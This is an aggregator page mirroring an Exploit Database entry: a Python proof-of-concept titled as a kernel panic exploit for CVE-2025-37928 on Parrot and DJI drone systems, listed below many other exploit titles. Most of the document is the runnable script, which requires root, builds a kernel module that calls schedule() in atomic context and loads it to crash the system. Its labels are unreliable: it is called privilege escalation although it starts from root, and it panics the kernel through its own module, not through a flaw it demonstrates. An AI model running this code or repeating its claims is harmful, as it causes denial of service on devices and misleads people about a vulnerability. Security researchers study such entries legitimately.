惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Schneier on Security
Schneier on Security
N
Netflix TechBlog - Medium
IT之家
IT之家
MongoDB | Blog
MongoDB | Blog
博客园_首页
S
SegmentFault 最新的问题
H
Help Net Security
P
Proofpoint News Feed
云风的 BLOG
云风的 BLOG
T
The Blog of Author Tim Ferriss
量子位
GbyAI
GbyAI
M
MIT News - Artificial intelligence
Recorded Future
Recorded Future
P
Privacy & Cybersecurity Law Blog
B
Blog
月光博客
月光博客
博客园 - 聂微东
Vercel News
Vercel News
罗磊的独立博客
腾讯CDC
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
A
Arctic Wolf
D
Darknet – Hacking Tools, Hacker News & Cyber Security
Stack Overflow Blog
Stack Overflow Blog
T
Threat Research - Cisco Blogs
Blog — PlanetScale
Blog — PlanetScale
L
Lohrmann on Cybersecurity
I
Intezer
小众软件
小众软件
T
The Exploit Database - CXSecurity.com
Jina AI
Jina AI
C
Check Point Blog
AWS News Blog
AWS News Blog
C
Cisco Blogs
Martin Fowler
Martin Fowler
The Last Watchdog
The Last Watchdog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
宝玉的分享
宝玉的分享
S
Security Affairs
大猫的无限游戏
大猫的无限游戏
N
News and Events Feed by Topic
雷峰网
雷峰网
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
H
Hacker News: Front Page
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
F
Full Disclosure
P
Proofpoint News Feed
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
Microsoft Security Blog
Microsoft Security Blog

The Exploit Database - CXSecurity.com

Joomla Page Builder CK <= 3.5.10 - Unauthenticated Arbitrary File Upload (RCE) Microsoft Edge <= 150.0.4078.48 (Chromium-based) Type Confusion RCE PraisonAI CodeAgent <= 1.6.77 Remote Code Execution (RCE) via Unsandboxed LLM Code Execution XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow
Parrot and DJI variants Drone OSes Kernel Panic Exploit
2025-06-26 · via The Exploit Database - CXSecurity.com

#!/usr/bin/env python3 # Exploit Title: Parrot and DJI variants Drone OSes - Kernel Panic Exploit # Author: Mohammed Idrees Banyamer # Instagram: @banyamer_security # GitHub: https://github.com/mbanyamer # Date: 2025-06-10 # Tested on: Parrot QRD, Parrot Alpha-M, DJI QRD, DJI Alpha-M # CVE: CVE-2025-37928 # Type: Local Privilege Escalation / Kernel Panic # Platform: Linux-based drone OS (Parrot and DJI variants) # Author Country: Jordan # CVSS v3.1 Score: 7.3 (Important) # Weakness: CWE-284: Improper Access Control # Attack Vector: Local # User Interaction: None # Scope: Unchanged # Confidentiality, Integrity, Availability Impact: High (Denial of Service via Kernel Panic) # Exploit Code Maturity: Proof of Concept # Remediation Level: Official Fix Available # # Description: # This PoC triggers a kernel panic by calling schedule() inside an atomic context, # exploiting CVE-2025-37928 present in certain Linux kernels running on # Parrot QRD, Parrot Alpha-M, DJI QRD, and DJI Alpha-M drone operating systems. # # Steps of exploitation: # 1. Check if running as root. # 2. Verify kernel version vulnerability. # 3. Detect drone type from system files. # 4. Build and load vulnerable kernel module. # 5. Trigger kernel panic by scheduling a tasklet calling schedule() in atomic context. # # Affected Drone Versions: # - Parrot QRD # - Parrot Alpha-M (DT) # - DJI QRD # - DJI Alpha-M (DT) # # ------------------------------------------------------------------------------ # Usage: # sudo python3 cve_2025_37928_tool.py [OPTIONS] # # Options: # --dry-run Run detection & build only (no module loading) # --force Force exploit even if kernel not detected as vulnerable # --cleanup-only Remove the kernel module without triggering panic # --verbose Enable detailed logging and debug output # --help Show usage information # # Examples: # sudo python3 cve_2025_37928_tool.py --dry-run # sudo python3 cve_2025_37928_tool.py # sudo python3 cve_2025_37928_tool.py --force # sudo python3 cve_2025_37928_tool.py --cleanup-only # # Warning: # This PoC causes an immediate kernel panic. # Use it ONLY in isolated and controlled environments (e.g., lab tests). # ------------------------------------------------------------------------------ import os import sys import subprocess import tempfile import argparse import shutil import platform MODULE_NAME = "cve_2025_37928_poc" C_FILENAME = MODULE_NAME + ".c" KO_FILENAME = MODULE_NAME + ".ko" KERNEL_MODULE_CODE = r''' #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <linux/interrupt.h> #include <linux/sched.h> MODULE_LICENSE("GPL"); MODULE_AUTHOR("PoC Author"); MODULE_DESCRIPTION("PoC for CVE-2025-37928: schedule() in atomic context causes kernel panic"); static void trigger_panic_tasklet(unsigned long data) { pr_alert("[CVE-2025-37928] Executing schedule() inside atomic context. This will panic!\n"); schedule(); // This causes kernel panic } DECLARE_TASKLET(my_tasklet, trigger_panic_tasklet, 0); static int __init poc_init(void) { pr_info("[CVE-2025-37928] Loading PoC module and scheduling tasklet...\n"); tasklet_schedule(&my_tasklet); return 0; } static void __exit poc_exit(void) { tasklet_kill(&my_tasklet); pr_info("[CVE-2025-37928] PoC module unloaded\n"); } module_init(poc_init); module_exit(poc_exit); ''' MAKEFILE_CONTENT = f''' obj-m += {MODULE_NAME}.o all: \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: \tmake -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ''' def check_root(): if os.geteuid() != 0: print("[-] Must be run as root.") sys.exit(1) def detect_kernel(): version = platform.release() vulnerable_versions = ["5.10", "5.15", "6.0"] vulnerable = any(v in version for v in vulnerable_versions) print(f"[i] Kernel version: {version} => {'VULNERABLE' if vulnerable else 'UNKNOWN/SAFE'}") return vulnerable def detect_drone_type(): print("[*] Detecting drone type...") files = ["/etc/drone_type", "/proc/device-tree/model", "/sys/firmware/devicetree/base/model"] found = [] for path in files: if os.path.exists(path): try: with open(path, "r") as f: content = f.read().strip() if any(x in content for x in ["Parrot", "DJI"]): found.append(content) except: continue if found: for d in found: print(f" [i] Found: {d}") else: print(" [!] No drone ID found.") return found def write_module(tempdir): c_path = os.path.join(tempdir, C_FILENAME) makefile_path = os.path.join(tempdir, "Makefile") with open(c_path, "w") as f: f.write(KERNEL_MODULE_CODE) with open(makefile_path, "w") as f: f.write(MAKEFILE_CONTENT) return c_path def build_module(tempdir): print("[*] Building module...") result = subprocess.run(["make"], cwd=tempdir, capture_output=True, text=True) if result.returncode != 0: print("[-] Build failed:\n", result.stderr) sys.exit(1) print("[+] Build successful.") return os.path.join(tempdir, KO_FILENAME) def load_module(ko_path): print("[*] Loading kernel module...") result = subprocess.run(["insmod", ko_path], capture_output=True, text=True) if result.returncode != 0: print("[-] insmod failed:\n", result.stderr) sys.exit(1) print("[!] Module loaded. Kernel panic should occur if vulnerable.") def unload_module(): print("[*] Attempting to remove module...") subprocess.run(["rmmod", MODULE_NAME], stderr=subprocess.DEVNULL) print("[+] Module removal attempted.") def clean_build(tempdir): subprocess.run(["make", "clean"], cwd=tempdir, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def main(): parser = argparse.ArgumentParser(description="CVE-2025-37928 Kernel Panic Exploit Tool for Drone OSes") parser.add_argument("--dry-run", action="store_true", help="Only simulate and check environment, no exploitation") parser.add_argument("--force", action="store_true", help="Force execution even if version unknown") parser.add_argument("--cleanup-only", action="store_true", help="Just remove kernel module if loaded") args = parser.parse_args() check_root() if args.cleanup_only: unload_module() return vulnerable = detect_kernel() detect_drone_type() if not vulnerable and not args.force: print("[-] Kernel not identified as vulnerable. Use --force to override.") sys.exit(1) if args.dry_run: print("[*] Dry run mode. Exiting before exploitation.") return with tempfile.TemporaryDirectory() as tempdir: print(f"[*] Working directory: {tempdir}") write_module(tempdir) ko_path = build_module(tempdir) try: load_module(ko_path) except KeyboardInterrupt: print("[!] Interrupted. Attempting cleanup...") finally: unload_module() clean_build(tempdir) if __name__ == "__main__": main()